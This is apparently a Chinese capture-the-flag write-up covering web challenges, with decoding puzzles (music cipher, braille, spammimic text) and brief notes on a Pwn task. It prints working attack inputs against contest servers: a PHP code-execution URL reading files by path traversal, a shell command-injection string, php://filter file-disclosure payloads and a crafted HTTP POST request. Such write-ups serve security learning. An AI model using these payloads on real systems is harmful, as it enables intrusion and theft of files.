Web

qiandao

签到题首先在源码中发现了某个php文件,然后发现提示./hint.php文件,下载该文件,得到一串音乐字符,直接解密即可:

https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=yinyue

♭‖§∮♯♭‖§∮♬♭‖§§♫♭‖§∮§♭‖§♩§♭‖♯♬¶♭‖§§♫♭‖§§¶♭‖♯¶§♭‖♯¶♫♭‖§∮♭♭‖§§♫♭‖§§♬♭‖♯♬♪♭‖♯¶♪♭‖♯¶‖♭‖♯¶♯♭‖♯♬♬♭‖♯♬♪♭‖♯¶♯♭‖♯¶♯♭‖♯¶∮♭‖§∮♭♭‖♯♬♪♭‖§§♬♭‖♯¶§♭‖♯¶‖♭‖§§♬♭‖♯♬♪♭‖§§♫♭‖♯¶♪♭‖♯¶♫♭‖♯¶§♭‖§∮♭♭‖♯♬¶♭‖♯♬♬♭‖♯¶‖♭‖♯¶♫♭‖♯¶∮♭‖♯¶∮♭‖§§♫♭‖§♩♪‖‖‖♭§♪==

解密后得到一串盲文:

⡖⡜⡑⡗⡋⠁⡑⡓⠅⠉⡕⡑⡒⠝⠇⠂⠄⠀⠝⠄⠄⠆⡕⠝⡒⠅⠂⡒⠝⡑⠇⠉⠅⡕⠁⠀⠂⠉⠆⠆⡑⡍=

https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=mangwen

再盲文解密,即可得到flag:

flag{1ac59eab-7240-446e-b52b-a795e102966a}

code excution

直接执行命令即可:payload如下:

http://183.129.189.60:10025/shell.php?php_cmd=var_dump(file_get_contents('../../../../../../../flag.txt'));

即可得到flag:

flag{8cc4060b-6adf-45f2-aa03-8194a7786031}

某个命令执行的题(不记得题目了)

?q=;ls>1.txt||

这样即可成功读取该目录下的文件名到1.txt中,某个文件名即为flag,真的不记得了。

file去哪里了

此题考察了任意文件读取

?file=php://filter/read=convert.base64-encode/resource=hint.php

使用上述payload即可成功读取hint.php文件,得到一封英文信封,

<?php
<h2>Dear Professional ; Especially for you - this cutting-edge
intelligence ! If you no longer wish to receive our
publications simply reply with a Subject: of "REMOVE"
and you will immediately be removed from our club .
This mail is being sent in compliance with Senate bill
2216 ; Title 9 ; Section 303 ! This is not multi-level
marketing ! Why work for somebody else when you can
become rich inside 34 weeks ! Have you ever noticed
nearly every commercial on television has a .com on
in it & more people than ever are surfing the web !
Well, now is your chance to capitalize on this . We
will help you increase customer response by 140% &
turn your business into an E-BUSINESS . You are guaranteed
to succeed because we take all the risk ! But don't
believe us . Mr Anderson of Arkansas tried us and says
"I've been poor and I've been rich - rich is better"
. We are licensed to operate in all states . We beseech
you - act now ! Sign up a friend and you'll get a discount
of 10% . Thanks . Dear E-Commerce professional ; You
made the right decision when you signed up for our
club ! This is a one time mailing there is no need
to request removal if you won't want any more . This
mail is being sent in compliance with Senate bill 1618
, Title 9 ; Section 301 . This is not multi-level marketing
. Why work for somebody else when you can become rich
within 95 WEEKS . Have you ever noticed more people
than ever are surfing the web plus nobody is getting
any younger ! Well, now is your chance to capitalize
on this ! We will help you deliver goods right to the
customer's doorstep & deliver goods right to the customer's
doorstep ! You can begin at absolutely no cost to you
. But don't believe us . Prof Anderson of California
tried us and says "I was skeptical but it worked for
me" ! We are a BBB member in good standing ! Do not
go to sleep without ordering . Sign up a friend and
you'll get a discount of 50% . Thank-you for your serious
consideration of our offer ! Dear E-Commerce professional
, This letter was specially selected to be sent to
you . If you are not interested in our publications
and wish to be removed from our lists, simply do NOT
respond and ignore this mail ! This mail is being sent
in compliance with Senate bill 1625 ; Title 7 ; Section
304 ! This is different than anything else you've seen
. Why work for somebody else when you can become rich
in 10 weeks . Have you ever noticed society seems to
be moving faster and faster and people will do almost
anything to avoid mailing their bills . Well, now is
your chance to capitalize on this . We will help you
process your orders within seconds and increase customer
response by 130% . You can begin at absolutely no cost
to you . But don't believe us . Mr Simpson who resides
in Alaska tried us and says "I was skeptical but it
worked for me" . This offer is 100% legal ! Because
the Internet operates on "Internet time" you must act
now ! Sign up a friend and you get half off ! Best
regards . (我爱珊珊来迟,也爱spam,久等了)<h2>
?>

http://spammimic.com/decode.cgi

直接解密即可得到flag:

flag{c655f308-5254-4903-84b0-f86d4c85c7a6}

缘分

直接提交admin admin发现php语法报错,报错页面中有admin123,然后继续提交admin admin123又得到一个报错页面,此页面中包含了flag。我们这题是1血,发现问题后立刻向主办方反映了情况。

php他又大又圆

直接给出payload:

POST /?user=php://input&pass[]=1&file=php://filter/read=convert.base64-encode/resource=hint.php HTTP/1.1
Host: 183.129.189.60:10005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 9

admin

成功读取出hint.php的源码即可得到提示,flag在f19g.php(文件名忘记了),继续使用上述payload读取f19g.php

base64解码后好像就可以得到如下这个包含flag的字符串:

<?php

error_reporting(E_ALL & ~E_NOTICE);

//flag{He6TuCTF@:F1a91stH1s}

?>

Pwn

wowotou

一个相对简单的格式化字符串漏洞,但也就只会这一个~~~

12-27 19:41